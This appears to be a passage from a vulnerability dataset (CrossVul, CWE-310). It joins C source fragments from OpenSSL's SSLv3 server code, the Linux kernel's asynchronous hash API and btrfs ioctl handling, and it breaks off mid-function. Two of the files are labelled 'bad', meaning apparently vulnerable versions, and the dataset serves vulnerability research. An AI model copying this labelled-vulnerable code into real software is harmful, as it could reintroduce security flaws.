/* Inconsistency alert: cert_chain does *not* include the
* peer's own certificate, while we do include it in s3_clnt.c */
sk=NULL;
ret=1;
if (0)
{
f_err:
ssl3_send_alert(s,SSL3_AL_FATAL,al);
}
err:
if (x != NULL) X509_free(x);
if (sk != NULL) sk_X509_pop_free(sk,X509_free);
return(ret);
}
int ssl3_send_server_certificate(SSL *s)
{
CERT_PKEY *cpk;
if (s->state == SSL3_ST_SW_CERT_A)
{
cpk=ssl_get_server_send_pkey(s);
if (cpk == NULL)
{
/* VRS: allow null cert if auth == KRB5 */
if ((s->s3->tmp.new_cipher->algorithm_auth != SSL_aKRB5) ||
(s->s3->tmp.new_cipher->algorithm_mkey & SSL_kKRB5))
{
SSLerr(SSL_F_SSL3_SEND_SERVER_CERTIFICATE,ERR_R_INTERNAL_ERROR);
return(0);
}
}
if (!ssl3_output_cert_chain(s,cpk))
{
SSLerr(SSL_F_SSL3_SEND_SERVER_CERTIFICATE,ERR_R_INTERNAL_ERROR);
return(0);
}
s->state=SSL3_ST_SW_CERT_B;
}
/* SSL3_ST_SW_CERT_B */
return ssl_do_write(s);
}
#ifndef OPENSSL_NO_TLSEXT
/* send a new session ticket (not necessarily for a new session) */
int ssl3_send_newsession_ticket(SSL *s)
{
if (s->state == SSL3_ST_SW_SESSION_TICKET_A)
{
unsigned char *p, *senc, *macstart;
const unsigned char *const_p;
int len, slen_full, slen;
SSL_SESSION *sess;
unsigned int hlen;
EVP_CIPHER_CTX ctx;
HMAC_CTX hctx;
SSL_CTX *tctx = s->initial_ctx;
unsigned char iv[EVP_MAX_IV_LENGTH];
unsigned char key_name[16];
/* get session encoding length */
slen_full = i2d_SSL_SESSION(s->session, NULL);
/* Some length values are 16 bits, so forget it if session is
* too long
*/
if (slen_full > 0xFF00)
return -1;
senc = OPENSSL_malloc(slen_full);
if (!senc)
return -1;
p = senc;
i2d_SSL_SESSION(s->session, &p);
/* create a fresh copy (not shared with other threads) to clean up */
const_p = senc;
sess = d2i_SSL_SESSION(NULL, &const_p, slen_full);
if (sess == NULL)
{
OPENSSL_free(senc);
return -1;
}
sess->session_id_length = 0; /* ID is irrelevant for the ticket */
slen = i2d_SSL_SESSION(sess, NULL);
if (slen > slen_full) /* shouldn't ever happen */
{
OPENSSL_free(senc);
return -1;
}
p = senc;
i2d_SSL_SESSION(sess, &p);
SSL_SESSION_free(sess);
/*-
* Grow buffer if need be: the length calculation is as
* follows handshake_header_length +
* 4 (ticket lifetime hint) + 2 (ticket length) +
* 16 (key name) + max_iv_len (iv length) +
* session_length + max_enc_block_size (max encrypted session
* length) + max_md_size (HMAC).
*/
if (!BUF_MEM_grow(s->init_buf,
SSL_HM_HEADER_LENGTH(s) + 22 + EVP_MAX_IV_LENGTH +
EVP_MAX_BLOCK_LENGTH + EVP_MAX_MD_SIZE + slen))
return -1;
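/* The constant 22 above is 4 (lifetime hint) + 2 (ticket length)
* + 16 (key name), matching the breakdown in the comment above.
*/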
p = ssl_handshake_start(s);
EVP_CIPHER_CTX_init(&ctx);
HMAC_CTX_init(&hctx);
/* Initialize HMAC and cipher contexts. If a callback is present
* it does all the work, otherwise use the generated values
* from the parent ctx.
*/
if (tctx->tlsext_ticket_key_cb)
{
if (tctx->tlsext_ticket_key_cb(s, key_name, iv, &ctx,
&hctx, 1) < 0)
{
OPENSSL_free(senc);
return -1;
}
}
else
{
RAND_pseudo_bytes(iv, 16);
EVP_EncryptInit_ex(&ctx, EVP_aes_128_cbc(), NULL,
tctx->tlsext_tick_aes_key, iv);
HMAC_Init_ex(&hctx, tctx->tlsext_tick_hmac_key, 16,
tlsext_tick_md(), NULL);
memcpy(key_name, tctx->tlsext_tick_key_name, 16);
}
/* Ticket lifetime hint (advisory only):
* We leave this unspecified for resumed sessions (for simplicity),
* and guess that tickets for new sessions will live as long
* as their sessions. */
l2n(s->hit ? 0 : s->session->timeout, p);
/* Skip ticket length for now */
p += 2;
/* Output key name */
macstart = p;
memcpy(p, key_name, 16);
p += 16;
/* output IV */
memcpy(p, iv, EVP_CIPHER_CTX_iv_length(&ctx));
p += EVP_CIPHER_CTX_iv_length(&ctx);
/* Encrypt session data */
EVP_EncryptUpdate(&ctx, p, &len, senc, slen);
p += len;
EVP_EncryptFinal(&ctx, p, &len);
p += len;
EVP_CIPHER_CTX_cleanup(&ctx);
HMAC_Update(&hctx, macstart, p - macstart);
HMAC_Final(&hctx, p, &hlen);
HMAC_CTX_cleanup(&hctx);
p += hlen;
/* Now write out lengths: p points to end of data written */
/* Total length */
len = p - ssl_handshake_start(s);
ssl_set_handshake_header(s, SSL3_MT_NEWSESSION_TICKET, len);
/* Skip ticket lifetime hint */
p = ssl_handshake_start(s) + 4;
s2n(len - 6, p);
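/* len covers the whole body; subtracting the 4-byte lifetime hint
* and the 2-byte length field itself leaves the ticket length.
*/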
s->state=SSL3_ST_SW_SESSION_TICKET_B;
OPENSSL_free(senc);
}
/* SSL3_ST_SW_SESSION_TICKET_B */
return ssl_do_write(s);
}
int ssl3_send_cert_status(SSL *s)
{
if (s->state == SSL3_ST_SW_CERT_STATUS_A)
{
unsigned char *p;
/*-
* Grow buffer if need be: the length calculation is as
* follows 1 (message type) + 3 (message length) +
* 1 (ocsp response type) + 3 (ocsp response length)
* + (ocsp response)
*/
if (!BUF_MEM_grow(s->init_buf, 8 + s->tlsext_ocsp_resplen))
return -1;
p=(unsigned char *)s->init_buf->data;
/* do the header */
*(p++)=SSL3_MT_CERTIFICATE_STATUS;
/* message length */
l2n3(s->tlsext_ocsp_resplen + 4, p);
/* status type */
*(p++)= s->tlsext_status_type;
/* length of OCSP response */
l2n3(s->tlsext_ocsp_resplen, p);
/* actual response */
memcpy(p, s->tlsext_ocsp_resp, s->tlsext_ocsp_resplen);
/* number of bytes to write */
s->init_num = 8 + s->tlsext_ocsp_resplen;
s->state=SSL3_ST_SW_CERT_STATUS_B;
s->init_off = 0;
}
/* SSL3_ST_SW_CERT_STATUS_B */
return(ssl3_do_write(s,SSL3_RT_HANDSHAKE));
}
# ifndef OPENSSL_NO_NEXTPROTONEG
/* ssl3_get_next_proto reads a Next Protocol Negotiation handshake message. It
* sets the next_proto member in s if found */
int ssl3_get_next_proto(SSL *s)
{
int ok;
int proto_len, padding_len;
long n;
const unsigned char *p;
/* Clients cannot send a NextProtocol message if we didn't see the
* extension in their ClientHello */
if (!s->s3->next_proto_neg_seen)
{
SSLerr(SSL_F_SSL3_GET_NEXT_PROTO,SSL_R_GOT_NEXT_PROTO_WITHOUT_EXTENSION);
return -1;
}
n=s->method->ssl_get_message(s,
SSL3_ST_SR_NEXT_PROTO_A,
SSL3_ST_SR_NEXT_PROTO_B,
SSL3_MT_NEXT_PROTO,
514, /* See the payload format below */
&ok);
if (!ok)
return((int)n);
/* s->state doesn't reflect whether ChangeCipherSpec has been received
* in this handshake, but s->s3->change_cipher_spec does (will be reset
* by ssl3_get_finished). */
if (!s->s3->change_cipher_spec)
{
SSLerr(SSL_F_SSL3_GET_NEXT_PROTO,SSL_R_GOT_NEXT_PROTO_BEFORE_A_CCS);
return -1;
}
if (n < 2)
return 0; /* The body must be at least 2 bytes long */
p=(unsigned char *)s->init_msg;
/*-
* The payload looks like:
* uint8 proto_len;
* uint8 proto[proto_len];
* uint8 padding_len;
* uint8 padding[padding_len];
*/
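/* The padding exists so that the message length does not reveal the
* length of the selected protocol; the NPN draft pads the body out
* to (roughly) a multiple of 32 bytes.
*/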
proto_len = p[0];
if (proto_len + 2 > s->init_num)
return 0;
padding_len = p[proto_len + 1];
if (proto_len + padding_len + 2 != s->init_num)
return 0;
s->next_proto_negotiated = OPENSSL_malloc(proto_len);
if (!s->next_proto_negotiated)
{
SSLerr(SSL_F_SSL3_GET_NEXT_PROTO,ERR_R_MALLOC_FAILURE);
return 0;
}
memcpy(s->next_proto_negotiated, p + 1, proto_len);
s->next_proto_negotiated_len = proto_len;
return 1;
}
# endif
#endif
| ./CrossVul/dataset_final_sorted/CWE-310/c/good_1445_5 |
crossvul-cpp_data_bad_5666_2 | /*
* Asynchronous Cryptographic Hash operations.
*
* This is the asynchronous version of hash.c with notification of
* completion via a callback.
*
* Copyright (c) 2008 Loc Ho <lho@amcc.com>
*
* This program is free software; you can redistribute it and/or modify it
* under the terms of the GNU General Public License as published by the Free
* Software Foundation; either version 2 of the License, or (at your option)
* any later version.
*
*/
#include <crypto/internal/hash.h>
#include <crypto/scatterwalk.h>
#include <linux/err.h>
#include <linux/kernel.h>
#include <linux/module.h>
#include <linux/sched.h>
#include <linux/slab.h>
#include <linux/seq_file.h>
#include <linux/cryptouser.h>
#include <net/netlink.h>
#include "internal.h"
struct ahash_request_priv {
crypto_completion_t complete;
void *data;
u8 *result;
void *ubuf[] CRYPTO_MINALIGN_ATTR;
};
static inline struct ahash_alg *crypto_ahash_alg(struct crypto_ahash *hash)
{
return container_of(crypto_hash_alg_common(hash), struct ahash_alg,
halg);
}
static int hash_walk_next(struct crypto_hash_walk *walk)
{
unsigned int alignmask = walk->alignmask;
unsigned int offset = walk->offset;
unsigned int nbytes = min(walk->entrylen,
((unsigned int)(PAGE_SIZE)) - offset);
walk->data = kmap_atomic(walk->pg);
walk->data += offset;
if (offset & alignmask) {
unsigned int unaligned = alignmask + 1 - (offset & alignmask);
if (nbytes > unaligned)
nbytes = unaligned;
}
walk->entrylen -= nbytes;
return nbytes;
}
static int hash_walk_new_entry(struct crypto_hash_walk *walk)
{
struct scatterlist *sg;
sg = walk->sg;
walk->pg = sg_page(sg);
walk->offset = sg->offset;
walk->entrylen = sg->length;
if (walk->entrylen > walk->total)
walk->entrylen = walk->total;
walk->total -= walk->entrylen;
return hash_walk_next(walk);
}
int crypto_hash_walk_done(struct crypto_hash_walk *walk, int err)
{
unsigned int alignmask = walk->alignmask;
unsigned int nbytes = walk->entrylen;
walk->data -= walk->offset;
if (nbytes && walk->offset & alignmask && !err) {
walk->offset = ALIGN(walk->offset, alignmask + 1);
walk->data += walk->offset;
nbytes = min(nbytes,
((unsigned int)(PAGE_SIZE)) - walk->offset);
walk->entrylen -= nbytes;
return nbytes;
}
kunmap_atomic(walk->data);
crypto_yield(walk->flags);
if (err)
return err;
if (nbytes) {
walk->offset = 0;
walk->pg++;
return hash_walk_next(walk);
}
if (!walk->total)
return 0;
walk->sg = scatterwalk_sg_next(walk->sg);
return hash_walk_new_entry(walk);
}
EXPORT_SYMBOL_GPL(crypto_hash_walk_done);
int crypto_hash_walk_first(struct ahash_request *req,
struct crypto_hash_walk *walk)
{
walk->total = req->nbytes;
if (!walk->total)
return 0;
walk->alignmask = crypto_ahash_alignmask(crypto_ahash_reqtfm(req));
walk->sg = req->src;
walk->flags = req->base.flags;
return hash_walk_new_entry(walk);
}
EXPORT_SYMBOL_GPL(crypto_hash_walk_first);
int crypto_hash_walk_first_compat(struct hash_desc *hdesc,
struct crypto_hash_walk *walk,
struct scatterlist *sg, unsigned int len)
{
walk->total = len;
if (!walk->total)
return 0;
walk->alignmask = crypto_hash_alignmask(hdesc->tfm);
walk->sg = sg;
walk->flags = hdesc->flags;
return hash_walk_new_entry(walk);
}
static int ahash_setkey_unaligned(struct crypto_ahash *tfm, const u8 *key,
unsigned int keylen)
{
unsigned long alignmask = crypto_ahash_alignmask(tfm);
int ret;
u8 *buffer, *alignbuffer;
unsigned long absize;
absize = keylen + alignmask;
buffer = kmalloc(absize, GFP_KERNEL);
if (!buffer)
return -ENOMEM;
alignbuffer = (u8 *)ALIGN((unsigned long)buffer, alignmask + 1);
memcpy(alignbuffer, key, keylen);
ret = tfm->setkey(tfm, alignbuffer, keylen);
kzfree(buffer);
return ret;
}
int crypto_ahash_setkey(struct crypto_ahash *tfm, const u8 *key,
unsigned int keylen)
{
unsigned long alignmask = crypto_ahash_alignmask(tfm);
if ((unsigned long)key & alignmask)
return ahash_setkey_unaligned(tfm, key, keylen);
return tfm->setkey(tfm, key, keylen);
}
EXPORT_SYMBOL_GPL(crypto_ahash_setkey);
static int ahash_nosetkey(struct crypto_ahash *tfm, const u8 *key,
unsigned int keylen)
{
return -ENOSYS;
}
static inline unsigned int ahash_align_buffer_size(unsigned len,
unsigned long mask)
{
return len + (mask & ~(crypto_tfm_ctx_alignment() - 1));
}
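/*
 * The extra bytes reserved above only need to cover the part of the
 * alignment mask that is not already guaranteed by the natural
 * crypto_tfm_ctx_alignment() of the allocation, so that PTR_ALIGN()
 * on the trailing ubuf area stays inside the buffer.
 */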
static void ahash_op_unaligned_finish(struct ahash_request *req, int err)
{
struct ahash_request_priv *priv = req->priv;
if (err == -EINPROGRESS)
return;
if (!err)
memcpy(priv->result, req->result,
crypto_ahash_digestsize(crypto_ahash_reqtfm(req)));
kzfree(priv);
}
static void ahash_op_unaligned_done(struct crypto_async_request *req, int err)
{
struct ahash_request *areq = req->data;
struct ahash_request_priv *priv = areq->priv;
crypto_completion_t complete = priv->complete;
void *data = priv->data;
ahash_op_unaligned_finish(areq, err);
complete(data, err);
}
static int ahash_op_unaligned(struct ahash_request *req,
int (*op)(struct ahash_request *))
{
struct crypto_ahash *tfm = crypto_ahash_reqtfm(req);
unsigned long alignmask = crypto_ahash_alignmask(tfm);
unsigned int ds = crypto_ahash_digestsize(tfm);
struct ahash_request_priv *priv;
int err;
priv = kmalloc(sizeof(*priv) + ahash_align_buffer_size(ds, alignmask),
(req->base.flags & CRYPTO_TFM_REQ_MAY_SLEEP) ?
GFP_KERNEL : GFP_ATOMIC);
if (!priv)
return -ENOMEM;
priv->result = req->result;
priv->complete = req->base.complete;
priv->data = req->base.data;
req->result = PTR_ALIGN((u8 *)priv->ubuf, alignmask + 1);
req->base.complete = ahash_op_unaligned_done;
req->base.data = req;
req->priv = priv;
err = op(req);
ahash_op_unaligned_finish(req, err);
return err;
}
static int crypto_ahash_op(struct ahash_request *req,
int (*op)(struct ahash_request *))
{
struct crypto_ahash *tfm = crypto_ahash_reqtfm(req);
unsigned long alignmask = crypto_ahash_alignmask(tfm);
if ((unsigned long)req->result & alignmask)
return ahash_op_unaligned(req, op);
return op(req);
}
int crypto_ahash_final(struct ahash_request *req)
{
return crypto_ahash_op(req, crypto_ahash_reqtfm(req)->final);
}
EXPORT_SYMBOL_GPL(crypto_ahash_final);
int crypto_ahash_finup(struct ahash_request *req)
{
return crypto_ahash_op(req, crypto_ahash_reqtfm(req)->finup);
}
EXPORT_SYMBOL_GPL(crypto_ahash_finup);
int crypto_ahash_digest(struct ahash_request *req)
{
return crypto_ahash_op(req, crypto_ahash_reqtfm(req)->digest);
}
EXPORT_SYMBOL_GPL(crypto_ahash_digest);
static void ahash_def_finup_finish2(struct ahash_request *req, int err)
{
struct ahash_request_priv *priv = req->priv;
if (err == -EINPROGRESS)
return;
if (!err)
memcpy(priv->result, req->result,
crypto_ahash_digestsize(crypto_ahash_reqtfm(req)));
kzfree(priv);
}
static void ahash_def_finup_done2(struct crypto_async_request *req, int err)
{
struct ahash_request *areq = req->data;
struct ahash_request_priv *priv = areq->priv;
crypto_completion_t complete = priv->complete;
void *data = priv->data;
ahash_def_finup_finish2(areq, err);
complete(data, err);
}
static int ahash_def_finup_finish1(struct ahash_request *req, int err)
{
if (err)
goto out;
req->base.complete = ahash_def_finup_done2;
req->base.flags &= ~CRYPTO_TFM_REQ_MAY_SLEEP;
err = crypto_ahash_reqtfm(req)->final(req);
out:
ahash_def_finup_finish2(req, err);
return err;
}
static void ahash_def_finup_done1(struct crypto_async_request *req, int err)
{
struct ahash_request *areq = req->data;
struct ahash_request_priv *priv = areq->priv;
crypto_completion_t complete = priv->complete;
void *data = priv->data;
err = ahash_def_finup_finish1(areq, err);
complete(data, err);
}
static int ahash_def_finup(struct ahash_request *req)
{
struct crypto_ahash *tfm = crypto_ahash_reqtfm(req);
unsigned long alignmask = crypto_ahash_alignmask(tfm);
unsigned int ds = crypto_ahash_digestsize(tfm);
struct ahash_request_priv *priv;
priv = kmalloc(sizeof(*priv) + ahash_align_buffer_size(ds, alignmask),
(req->base.flags & CRYPTO_TFM_REQ_MAY_SLEEP) ?
GFP_KERNEL : GFP_ATOMIC);
if (!priv)
return -ENOMEM;
priv->result = req->result;
priv->complete = req->base.complete;
priv->data = req->base.data;
req->result = PTR_ALIGN((u8 *)priv->ubuf, alignmask + 1);
req->base.complete = ahash_def_finup_done1;
req->base.data = req;
req->priv = priv;
return ahash_def_finup_finish1(req, tfm->update(req));
}
static int ahash_no_export(struct ahash_request *req, void *out)
{
return -ENOSYS;
}
static int ahash_no_import(struct ahash_request *req, const void *in)
{
return -ENOSYS;
}
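/*
 * Per-tfm initialisation: install stub handlers for the optional setkey,
 * export and import callbacks, fall back to the async shash wrapper for
 * algorithms that are not native ahash implementations, and otherwise
 * copy the operation pointers from the registered ahash_alg.
 */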
static int crypto_ahash_init_tfm(struct crypto_tfm *tfm)
{
struct crypto_ahash *hash = __crypto_ahash_cast(tfm);
struct ahash_alg *alg = crypto_ahash_alg(hash);
hash->setkey = ahash_nosetkey;
hash->export = ahash_no_export;
hash->import = ahash_no_import;
if (tfm->__crt_alg->cra_type != &crypto_ahash_type)
return crypto_init_shash_ops_async(tfm);
hash->init = alg->init;
hash->update = alg->update;
hash->final = alg->final;
hash->finup = alg->finup ?: ahash_def_finup;
hash->digest = alg->digest;
if (alg->setkey)
hash->setkey = alg->setkey;
if (alg->export)
hash->export = alg->export;
if (alg->import)
hash->import = alg->import;
return 0;
}
static unsigned int crypto_ahash_extsize(struct crypto_alg *alg)
{
if (alg->cra_type == &crypto_ahash_type)
return alg->cra_ctxsize;
return sizeof(struct crypto_shash *);
}
#ifdef CONFIG_NET
static int crypto_ahash_report(struct sk_buff *skb, struct crypto_alg *alg)
{
struct crypto_report_hash rhash;
snprintf(rhash.type, CRYPTO_MAX_ALG_NAME, "%s", "ahash");
rhash.blocksize = alg->cra_blocksize;
rhash.digestsize = __crypto_hash_alg_common(alg)->digestsize;
if (nla_put(skb, CRYPTOCFGA_REPORT_HASH,
sizeof(struct crypto_report_hash), &rhash))
goto nla_put_failure;
return 0;
nla_put_failure:
return -EMSGSIZE;
}
#else
static int crypto_ahash_report(struct sk_buff *skb, struct crypto_alg *alg)
{
return -ENOSYS;
}
#endif
static void crypto_ahash_show(struct seq_file *m, struct crypto_alg *alg)
__attribute__ ((unused));
static void crypto_ahash_show(struct seq_file *m, struct crypto_alg *alg)
{
seq_printf(m, "type : ahash\n");
seq_printf(m, "async : %s\n", alg->cra_flags & CRYPTO_ALG_ASYNC ?
"yes" : "no");
seq_printf(m, "blocksize : %u\n", alg->cra_blocksize);
seq_printf(m, "digestsize : %u\n",
__crypto_hash_alg_common(alg)->digestsize);
}
const struct crypto_type crypto_ahash_type = {
.extsize = crypto_ahash_extsize,
.init_tfm = crypto_ahash_init_tfm,
#ifdef CONFIG_PROC_FS
.show = crypto_ahash_show,
#endif
.report = crypto_ahash_report,
.maskclear = ~CRYPTO_ALG_TYPE_MASK,
.maskset = CRYPTO_ALG_TYPE_AHASH_MASK,
.type = CRYPTO_ALG_TYPE_AHASH,
.tfmsize = offsetof(struct crypto_ahash, base),
};
EXPORT_SYMBOL_GPL(crypto_ahash_type);
struct crypto_ahash *crypto_alloc_ahash(const char *alg_name, u32 type,
u32 mask)
{
return crypto_alloc_tfm(alg_name, &crypto_ahash_type, type, mask);
}
EXPORT_SYMBOL_GPL(crypto_alloc_ahash);
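/*
 * Validation shared by crypto_register_ahash() and
 * ahash_register_instance(): reject oversized digest/state sizes and
 * stamp the algorithm with the ahash type flags.
 */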
static int ahash_prepare_alg(struct ahash_alg *alg)
{
struct crypto_alg *base = &alg->halg.base;
if (alg->halg.digestsize > PAGE_SIZE / 8 ||
alg->halg.statesize > PAGE_SIZE / 8)
return -EINVAL;
base->cra_type = &crypto_ahash_type;
base->cra_flags &= ~CRYPTO_ALG_TYPE_MASK;
base->cra_flags |= CRYPTO_ALG_TYPE_AHASH;
return 0;
}
int crypto_register_ahash(struct ahash_alg *alg)
{
struct crypto_alg *base = &alg->halg.base;
int err;
err = ahash_prepare_alg(alg);
if (err)
return err;
return crypto_register_alg(base);
}
EXPORT_SYMBOL_GPL(crypto_register_ahash);
int crypto_unregister_ahash(struct ahash_alg *alg)
{
return crypto_unregister_alg(&alg->halg.base);
}
EXPORT_SYMBOL_GPL(crypto_unregister_ahash);
int ahash_register_instance(struct crypto_template *tmpl,
struct ahash_instance *inst)
{
int err;
err = ahash_prepare_alg(&inst->alg);
if (err)
return err;
return crypto_register_instance(tmpl, ahash_crypto_instance(inst));
}
EXPORT_SYMBOL_GPL(ahash_register_instance);
void ahash_free_instance(struct crypto_instance *inst)
{
crypto_drop_spawn(crypto_instance_ctx(inst));
kfree(ahash_instance(inst));
}
EXPORT_SYMBOL_GPL(ahash_free_instance);
int crypto_init_ahash_spawn(struct crypto_ahash_spawn *spawn,
struct hash_alg_common *alg,
struct crypto_instance *inst)
{
return crypto_init_spawn2(&spawn->base, &alg->base, inst,
&crypto_ahash_type);
}
EXPORT_SYMBOL_GPL(crypto_init_ahash_spawn);
struct hash_alg_common *ahash_attr_alg(struct rtattr *rta, u32 type, u32 mask)
{
struct crypto_alg *alg;
alg = crypto_attr_alg2(rta, &crypto_ahash_type, type, mask);
return IS_ERR(alg) ? ERR_CAST(alg) : __crypto_hash_alg_common(alg);
}
EXPORT_SYMBOL_GPL(ahash_attr_alg);
MODULE_LICENSE("GPL");
MODULE_DESCRIPTION("Asynchronous cryptographic hash type");
| ./CrossVul/dataset_final_sorted/CWE-310/c/bad_5666_2 |
crossvul-cpp_data_bad_3783_3 | /*
* Copyright (C) 2007 Oracle. All rights reserved.
*
* This program is free software; you can redistribute it and/or
* modify it under the terms of the GNU General Public
* License v2 as published by the Free Software Foundation.
*
* This program is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
* General Public License for more details.
*
* You should have received a copy of the GNU General Public
* License along with this program; if not, write to the
* Free Software Foundation, Inc., 59 Temple Place - Suite 330,
* Boston, MA 021110-1307, USA.
*/
#include <linux/kernel.h>
#include <linux/bio.h>
#include <linux/buffer_head.h>
#include <linux/file.h>
#include <linux/fs.h>
#include <linux/fsnotify.h>
#include <linux/pagemap.h>
#include <linux/highmem.h>
#include <linux/time.h>
#include <linux/init.h>
#include <linux/string.h>
#include <linux/backing-dev.h>
#include <linux/mount.h>
#include <linux/mpage.h>
#include <linux/namei.h>
#include <linux/swap.h>
#include <linux/writeback.h>
#include <linux/statfs.h>
#include <linux/compat.h>
#include <linux/bit_spinlock.h>
#include <linux/security.h>
#include <linux/xattr.h>
#include <linux/vmalloc.h>
#include <linux/slab.h>
#include <linux/blkdev.h>
#include <linux/uuid.h>
#include "compat.h"
#include "ctree.h"
#include "disk-io.h"
#include "transaction.h"
#include "btrfs_inode.h"
#include "ioctl.h"
#include "print-tree.h"
#include "volumes.h"
#include "locking.h"
#include "inode-map.h"
#include "backref.h"
#include "rcu-string.h"
#include "send.h"
#include "dev-replace.h"
/* Mask out flags that are inappropriate for the given type of inode. */
static inline __u32 btrfs_mask_flags(umode_t mode, __u32 flags)
{
if (S_ISDIR(mode))
return flags;
else if (S_ISREG(mode))
return flags & ~FS_DIRSYNC_FL;
else
return flags & (FS_NODUMP_FL | FS_NOATIME_FL);
}
/*
* Export inode flags to the format expected by the FS_IOC_GETFLAGS ioctl.
*/
static unsigned int btrfs_flags_to_ioctl(unsigned int flags)
{
unsigned int iflags = 0;
if (flags & BTRFS_INODE_SYNC)
iflags |= FS_SYNC_FL;
if (flags & BTRFS_INODE_IMMUTABLE)
iflags |= FS_IMMUTABLE_FL;
if (flags & BTRFS_INODE_APPEND)
iflags |= FS_APPEND_FL;
if (flags & BTRFS_INODE_NODUMP)
iflags |= FS_NODUMP_FL;
if (flags & BTRFS_INODE_NOATIME)
iflags |= FS_NOATIME_FL;
if (flags & BTRFS_INODE_DIRSYNC)
iflags |= FS_DIRSYNC_FL;
if (flags & BTRFS_INODE_NODATACOW)
iflags |= FS_NOCOW_FL;
if ((flags & BTRFS_INODE_COMPRESS) && !(flags & BTRFS_INODE_NOCOMPRESS))
iflags |= FS_COMPR_FL;
else if (flags & BTRFS_INODE_NOCOMPRESS)
iflags |= FS_NOCOMP_FL;
return iflags;
}
/*
* Update inode->i_flags based on the btrfs internal flags.
*/
void btrfs_update_iflags(struct inode *inode)
{
struct btrfs_inode *ip = BTRFS_I(inode);
inode->i_flags &= ~(S_SYNC|S_APPEND|S_IMMUTABLE|S_NOATIME|S_DIRSYNC);
if (ip->flags & BTRFS_INODE_SYNC)
inode->i_flags |= S_SYNC;
if (ip->flags & BTRFS_INODE_IMMUTABLE)
inode->i_flags |= S_IMMUTABLE;
if (ip->flags & BTRFS_INODE_APPEND)
inode->i_flags |= S_APPEND;
if (ip->flags & BTRFS_INODE_NOATIME)
inode->i_flags |= S_NOATIME;
if (ip->flags & BTRFS_INODE_DIRSYNC)
inode->i_flags |= S_DIRSYNC;
}
/*
* Inherit flags from the parent inode.
*
* Currently only the compression flags and the cow flags are inherited.
*/
void btrfs_inherit_iflags(struct inode *inode, struct inode *dir)
{
unsigned int flags;
if (!dir)
return;
flags = BTRFS_I(dir)->flags;
if (flags & BTRFS_INODE_NOCOMPRESS) {
BTRFS_I(inode)->flags &= ~BTRFS_INODE_COMPRESS;
BTRFS_I(inode)->flags |= BTRFS_INODE_NOCOMPRESS;
} else if (flags & BTRFS_INODE_COMPRESS) {
BTRFS_I(inode)->flags &= ~BTRFS_INODE_NOCOMPRESS;
BTRFS_I(inode)->flags |= BTRFS_INODE_COMPRESS;
}
if (flags & BTRFS_INODE_NODATACOW)
BTRFS_I(inode)->flags |= BTRFS_INODE_NODATACOW;
btrfs_update_iflags(inode);
}
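/* FS_IOC_GETFLAGS: report the inode's flags in the generic FS_*_FL format. */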
static int btrfs_ioctl_getflags(struct file *file, void __user *arg)
{
struct btrfs_inode *ip = BTRFS_I(file->f_path.dentry->d_inode);
unsigned int flags = btrfs_flags_to_ioctl(ip->flags);
if (copy_to_user(arg, &flags, sizeof(flags)))
return -EFAULT;
return 0;
}
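/*
 * Validate flags from FS_IOC_SETFLAGS: only flags btrfs can store are
 * accepted, and COMPR/NOCOMP are mutually exclusive.
 */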
static int check_flags(unsigned int flags)
{
if (flags & ~(FS_IMMUTABLE_FL | FS_APPEND_FL | \
FS_NOATIME_FL | FS_NODUMP_FL | \
FS_SYNC_FL | FS_DIRSYNC_FL | \
FS_NOCOMP_FL | FS_COMPR_FL |
FS_NOCOW_FL))
return -EOPNOTSUPP;
if ((flags & FS_NOCOMP_FL) && (flags & FS_COMPR_FL))
return -EINVAL;
return 0;
}
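/*
 * FS_IOC_SETFLAGS: translate the generic FS_*_FL flags into btrfs inode
 * flags, enforce the usual permission rules (owner or capable, write
 * access, CAP_LINUX_IMMUTABLE for append/immutable changes), and persist
 * the change in a transaction.  The old flags are restored on error.
 */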
static int btrfs_ioctl_setflags(struct file *file, void __user *arg)
{
struct inode *inode = file->f_path.dentry->d_inode;
struct btrfs_inode *ip = BTRFS_I(inode);
struct btrfs_root *root = ip->root;
struct btrfs_trans_handle *trans;
unsigned int flags, oldflags;
int ret;
u64 ip_oldflags;
unsigned int i_oldflags;
umode_t mode;
if (btrfs_root_readonly(root))
return -EROFS;
if (copy_from_user(&flags, arg, sizeof(flags)))
return -EFAULT;
ret = check_flags(flags);
if (ret)
return ret;
if (!inode_owner_or_capable(inode))
return -EACCES;
ret = mnt_want_write_file(file);
if (ret)
return ret;
mutex_lock(&inode->i_mutex);
ip_oldflags = ip->flags;
i_oldflags = inode->i_flags;
mode = inode->i_mode;
flags = btrfs_mask_flags(inode->i_mode, flags);
oldflags = btrfs_flags_to_ioctl(ip->flags);
if ((flags ^ oldflags) & (FS_APPEND_FL | FS_IMMUTABLE_FL)) {
if (!capable(CAP_LINUX_IMMUTABLE)) {
ret = -EPERM;
goto out_unlock;
}
}
if (flags & FS_SYNC_FL)
ip->flags |= BTRFS_INODE_SYNC;
else
ip->flags &= ~BTRFS_INODE_SYNC;
if (flags & FS_IMMUTABLE_FL)
ip->flags |= BTRFS_INODE_IMMUTABLE;
else
ip->flags &= ~BTRFS_INODE_IMMUTABLE;
if (flags & FS_APPEND_FL)
ip->flags |= BTRFS_INODE_APPEND;
else
ip->flags &= ~BTRFS_INODE_APPEND;
if (flags & FS_NODUMP_FL)
ip->flags |= BTRFS_INODE_NODUMP;
else
ip->flags &= ~BTRFS_INODE_NODUMP;
if (flags & FS_NOATIME_FL)
ip->flags |= BTRFS_INODE_NOATIME;
else
ip->flags &= ~BTRFS_INODE_NOATIME;
if (flags & FS_DIRSYNC_FL)
ip->flags |= BTRFS_INODE_DIRSYNC;
else
ip->flags &= ~BTRFS_INODE_DIRSYNC;
if (flags & FS_NOCOW_FL) {
if (S_ISREG(mode)) {
/*
* It's safe to turn csums off here, no extents exist.
* Otherwise we want the flag to reflect the real COW
* status of the file and will not set it.
*/
if (inode->i_size == 0)
ip->flags |= BTRFS_INODE_NODATACOW
| BTRFS_INODE_NODATASUM;
} else {
ip->flags |= BTRFS_INODE_NODATACOW;
}
} else {
/*
* Revert back under the same assumptions as above
*/
if (S_ISREG(mode)) {
if (inode->i_size == 0)
ip->flags &= ~(BTRFS_INODE_NODATACOW
| BTRFS_INODE_NODATASUM);
} else {
ip->flags &= ~BTRFS_INODE_NODATACOW;
}
}
/*
* The COMPRESS flag can only be changed by users, while the NOCOMPRESS
* flag may be changed automatically if compression code won't make
* things smaller.
*/
if (flags & FS_NOCOMP_FL) {
ip->flags &= ~BTRFS_INODE_COMPRESS;
ip->flags |= BTRFS_INODE_NOCOMPRESS;
} else if (flags & FS_COMPR_FL) {
